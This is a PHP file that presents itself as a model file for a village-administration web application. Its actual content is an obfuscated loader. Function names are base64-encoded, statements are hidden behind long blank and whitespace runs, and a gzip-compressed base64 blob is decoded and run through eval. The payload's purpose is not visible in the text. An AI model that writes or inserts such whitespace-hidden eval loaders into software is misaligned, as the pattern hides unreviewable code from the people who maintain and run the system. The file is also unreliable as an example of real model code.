<?php 
        $__='printf';$_='Loading donjo-app/models/Pembangunan_dokumentasi_model.php';
        











































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtXFtzm1i2fk/V/Ic8TJV7Kme6AUXpUKk8CCwQWJIDiIt4SXGxQeYiYl3Rrz/f2oAsKc505sypmZoubbfbZdiXdfnWWt9eSvL2bTP++hXj8031vCjXjzef2K/t+HwTL8un5d+DqvqtWMYP+eq3Lw9FGJTJpgzKr/Ey2xQP5TpYLb6y179WafVWzoPV6tdff7359KY94e1f3ly/rl//rq83BOG3/4/j83dPbjxeXM1dfuGrw8837NEL2n9qtGH2+e11XMd1XMefc9xEhcPFnr7RVEeYu7ulroiPXp393iRNZM0mXX+9muo6ruM6ruM6ruM6ruM6ruO/bVzbGddxHddxHX/ecRMGq4cP77/GD9Eyfrj5dLXIdVzHdVzHdVzHvzTO/+zFrbGcyoWZ+0W+8V1jqXO6ZHOOYTimptdZMuO1xPfSKpaTclZ8THw1r313ymmj6VNU5LtYltK5MM2j3iSZu/tV2ItzX46q+x13h723dwvsvxh804Z+Fap2Erj96j7h7jS5e85vfdVZaYqUh66ehkXMh4Wy0VRzG/Scte/2ubk3rbBXctesgwziJig+rueetBsLzfqoFg3f5Rdzt1/Gbj8NczELhTUfus4mVpVD4IjrUDDzUO7vgtGAnc32XHycyth3XC+/nZ5hFvnKt6QqLLJkXihl4DKZ0qjIPpzOm/Ugdz7VzcGJTsq0ino4i633t1HBp5GQQW7nMLekQ0yf6XtaEqtOPS+dZzzjw9Lkg1qCvnwa0DP3fTPfOLWVsgvV/JnsQbKEC+kQ9rCHYCdzQcw6eclHgbuvolrCOXqG+ZB7TfNXgTfNwxLrh7ExkyV3sjvdP00hw23gSdzcGtST20Ffk7lk8jTYTy3pNhT4BfyXa4qeR4LIR8U014b5BrpW8cjhAlfcaHK6jEfm7n7xcRuOnDX02/jCeht6zibwYL+6v/E9Y3vX6JVYqvKsDWGvkZlqt9puMpsnY3a2tiNMQG4+9GAfFfYfmjh3mJhqXtJeoSzZ0G8Ru+u0Ozc6LLdjQdwBN5kPvcdFnt2d2RB+KWKyRWcrslEVCOTf/EPgvl8B2/lcUGr4pYwKhQu8yUpT13mkKhn5D1jY4ecuho8egAuf+a0PO0tprDI7HxALFeG4wZiEd3qljUgfheyRIm5WhFPYu5WDzm9iBPh+BkbgJ5PhhnAC+RCDg6WWnWAAtg8srRrLR/xk8B3O2KeIHcJQozNsG5ZSqql6SrEwZzrCloRLzNNU5vcTDPZLv+ds5i7psksohqDnitlG5cl+PGJi2WBQpD355rlJuAf2dD4Scjp/1eoPPRQ6E7HNztjNXfh7NO3DLmSLxgc9hzvLDU1OgJw5N3dTnmIiILyoLV5UE3GgID9MGvuNXpnvVVXna6ytYzY3P+A8rtEPvnH3adjiMRIIx8oOsqWw84b2mANrsSUht8QV/R6plFNy8rsUqXvCziGwJB1nAKN6ynxcH3HSp5zU2m0JjPCIyxObxcuAzi/iE3+9ogfyJpuvEn7iNFpIz75nEkbY+5B0cvskx3cyneYre+hYht0fWZxia8O9M8uUMXB0b1nS0HKmijnMJby712R9Ztq6ZHKKPrOVewP7mkPl3rWHC+DNxh4Gnt0ZNq9jj3vkJvrdcGxgZKhLlr1KHJxl8zjPMRLs4eC/+xYPtunoM8vRJUd+TzLdO/Zet2FPZ6g48Lsys50RyYmcJFnISZaDMy1phvMk5FcFMk4gs23ZJr2XsR/JBIQ592YNuZxYMhZsv5k2XE8MO59C7jHmOTanjA37fYIaJzldHuIcz7Ar3eh0cSRn1q0neTJkOLsvHddZEu15P8tzyGMqdraWLOiJdRPLXqOGZoll9/XxWa0j3E/h5ziXbZajZpZtdO/S2DOXYU/THTVfM+wXcVsTo6bOZCz/dfOfwp7UB0bKYGTo3+XR26zNo0Mez7fYBzFgJ3bhHGuGBbwAxxzOrULhfXKnplw8GnwY1+KKahTyUxkI4ho/K8ob46Kfx/LHqvXhADVn94C49YWUk+3L2jEU2tpRT2TJQLxRTkPO3FPMDSk3IxdjLWF8lzjHWjhYBiOTi0YTkmNLsdbUzX7ly1mnO3IRq2O57B5l7sW9CLHR58eFWPvQoZsDblBG6m6DfdfhIB/ZQ5z3NDnZq/+sDfKT+hFDX8Tdov8UCtz2WONl8QvJY3P58JQ7zIV9SvzHVlHvKPZZ7uw/nufx/DF0UaOhK/gUR/UiYrgWp4yXgD88oBbLnlSH4A5zfPvyIIPdF1QTvlgD6HC+f1Q4hSec8yT9sGIyyS58XoKnDUXLRBx6nCLPhrSPFEJ2XZ5Nki+z94kuGBvsWyPvMZ7kW9GqeW8c3wfIifBf2tTN7r19fD/v6TlyZO4rqAVy896btXIg382LfTWvpQI4egLetvB/idwF+yB3W0kWuAbVXC4iDloPMsiCHDpdardcotcR4U1ntjGyDBhBjUQcLAaiJptcgLw3nqH2Lrh3WLcibnqn0NmZLltxNl4sy/GA1uYx8QDssf5S+DX8utTKFeybgidx7xo7O6KmGouXedUWNW+p9y646WhQjuVB6cvApEJxfMI7Sa7RYAOdyuM+ZbyE/fI7GfKAj3gX++n1LtFV8JTOZkZe+YvB0qd4GWVLnfiIpz8FcsZsIXudfibw2UfNb+IXGHmxz1Mz55HJkOch9vjptbCl39O3sSc9op6nUWksW12wjntH/MO3EtKf1aCG07R6vMjanMPsKNaeQDXJXurCOme8F/ZC3SI7Hv19ekZ3PsXJnZz93sjOdfapcS74J/CnAufgHQxXTOdcZHeaBHcTV0dso96DgyKemJ6IdVb772Tzdd/dDs7wFqniAbzrFGsVuBQfy8Abe5d0dx2yaUZcwa3jV/aOY4Zn9Xv/37dnsXhwViVsSXFe6zyXaPKg+z6VgUeN34JDPXZzL/cE1kr6s8NzTysbXGW6Dr4GnIeE56ictnnJLj2rOYMwwHRSVuV5TiDZP8K30hZ4eG39B8i2C3tT7qi7px/anJRDj98v7HOOm05Psk93xgVOvEsdhCnuoQryqPk494wTHYhrmxRr/tjl1r4safe4s0V1cyc9tTPwlb3kLejY2ZmdAazy2Tq0+EwbJh+CWXXAffj3BluZHrhz1EtnjXrbB5Y6vY4296wMfN/ZEJ/8wfvjXjHDJAx01I3uAc7jCQ5a2XOe6hkwd9QhFPaZBz5Ivo+AsZcckmWo81wkf58nX2Ig3l3cmWFT/6JuZSxGm1x9ob9sIkbN3R1w4/FTxean+ozrAx9Tvu0JkF8QU8PG/y7u6eAduiLOTGcK7iPewya4D0+fwAcOhANgcD2Z/XEcd75jcSyzuF1p15i+xvSfPKY7vuKr2imvQAxEDf67Wmk1sdnY31wG3gR12Fw0OGttcYEvDzzOv+ybWWxfpuslP9FVkQf3rvD+0eacGXjxl1kOnPWcp7ngHKK6iY9J62ff3QN3f5ArZG7P7NLVevDhwPNJ3sv4X4WC8mKn/DI2wSsL6jlNzmK/s1+oiqkvMy6zAGbrB/CZbs8WE2TDy9i8BWcqAjciTIIX6SnWdVzzGL8R/BjIEePHs6E4Npyp7nGxNAMPt6xdNz8NMT8WHOQOs4/YBBYH4pcFeKWQF49qtfN7+294Xj6OJPDilncbWRm6ynuvN60eCruEfd9pKp8+KGJ7PriahXvN7XA3eTKaNVanz8ct7rYZ9T2CpufyTL2TtoeVUW8wQvxTL+xLx7ddMzUK1n86kC819xgfj2aWT5DHQ12tcFfNDx5ht1DWlFu6/NTWiRTYlrvztBkn4s5sObZ9zmeBZdyya9wPqB8waeNDPMquIL/UEhdApqDpbVbUH4uQN+jeiTuzZg9e8Al9DEsZ0F8HUC17D8xBPlUsQ+ASccuF4JedvFTjPM7X4aOZW5vfkOeqiOcRt8CSa7PY72K7xZJ+UcdgO30LHK4jISIsb5B7F8DzO23Y2Kfr77FezgixynpZZkV5eV6IuLukrO+rPR05+j+Mq/GsravEh13sUzhP1KeHfSiPszs77ofUMzjWC7oPtNju8Dqk2Kb9Zrkzmd0288b1R+oPwL459cEOTc8Z9zhgPiqzRO85uyaGoiaHdzmm7J4znkG8nNZ/wH3h5a7VxpkhiBu/yI+y0ZlO+w73QT7oAY+7k3zzyhngKo/dfsBZ47f6u3vSd7q+vhe7j3Y1hcljlA71J3Hf5tPOf9QPAf5S5PJaI7zKEnLCPieZI4H1RaG3g1y0or5kHVgScozYQ92o2xjOCHdzm9UEB9h4JpngL6oNS7vnFLDLe4d08ZzcEpx7Or/5TAJ2bPU1O25Bzx2RZMxf6kojv4lYjtUsYedZrZzARaiyzyNYrdZUwviw0+u0D/zkuzHlipT5opZWlF+BQ5YvWE9b1euwF6PWaZ2t2Rl24TB5GDcb6XkTZ0l3J/whFhBHF3kUsbk49x/msDO8Y2zu/q/7bo52dVAr3A4vbb40su24lkbQmYMPWwywnnONmtGH71vsSN8C+gyixcec8iXVTur1qNk6am2BXLA+2bdZc7SNBB6BmiBjTaGsQlVP58IqwZ258x142b7q8PMHGGC8r3nW7u8ayZd68AruloiFVo/hOVfpcuP3efiodyPz4Ic9hp/MX9k5J0CcRKxnwB/8du7r8Zof4NP0wRGb3FtOliyHwYbNz9O+QaYf/5qYnKQvvZVT3YcVaudv4DN/gDdw42HfmQ13bP8up0YjZ4Fc9wQcgE9Nm8/DVORi1eH8ps91wkVOehjn/KwXoB5Qf4V6SFSXaB3d3cCfcsbbjrYw03mxz+9+4r7EPt+V/zUZWl9hTsz46nnvzH55D1/EdZtHX3jca31A2LWfXfYwX+/NUD8pb/3Z8YTBj/nwd+ujH9wP2z4V9ZwaXt9xPm4OO/rWy3vgB3fVPdf1o8jv9H3z6c2bf/8H+J/Zz1/a3/726Z9ZfrL2Zxb+9eXAX27o/zf/czz2+u8vXL/+E//+wjk2fzkLhgaaf/v0vwPSCtc=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      










































































































































































































































































































                                                                                                                                                                                                                     $________;
